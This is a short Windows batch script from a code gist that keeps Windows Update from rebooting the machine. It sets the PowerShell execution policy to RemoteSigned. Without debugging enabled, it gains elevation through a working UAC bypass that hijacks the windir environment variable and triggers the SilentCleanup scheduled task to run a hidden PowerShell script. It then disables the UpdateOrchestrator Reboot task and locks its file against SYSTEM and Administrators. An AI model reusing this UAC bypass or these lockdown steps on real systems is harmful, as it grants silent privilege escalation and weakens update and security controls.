gists/kill-reboot.cmd

33 lines
1.4 KiB
Batchfile
Raw Normal View History

2018-04-13 16:32:14 -07:00
@echo off
set debug=0
set ps_reg="HKCU\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell"
rem check if the key already exists.
reg query %ps_reg% /v ExecutionPolicy >nul 2>&1
if NOT %errorLevel% == 0 (
rem set it just high enough so we can run our script.
reg add %ps_reg% /t REG_SZ /v ExecutionPolicy /d RemoteSigned
)
rem check if we're at least running as an admin.
net session >nul 2>&1
if NOT %errorLevel% == 0 (
rem re-run this script as system.
rem that's more than administrator, but less than trusted installer.
if "%debug%"=="1" (
powershell -Command "Start-Process powershell {%~dp0\elevate.ps1 %0} -Verb RunAs"
) else (
rem this version bypasses UAC. please refer to the following post:
rem https://tyranidslair.blogspot.ca/2017/05/exploiting-environment-variables-in.html
reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && powershell -WindowStyle Hidden -NonInteractive %~dp0\elevate.ps1 %0 && REM "
)
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
exit
)
schtasks /change /tn \Microsoft\Windows\UpdateOrchestrator\Reboot /DISABLE
icacls "%WINDIR%\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot" /inheritance:r /deny "Everyone:F" /deny "SYSTEM:F" /deny "Local Service:F" /deny "Administrators:F"
if "%debug%"=="1" ( pause )
exit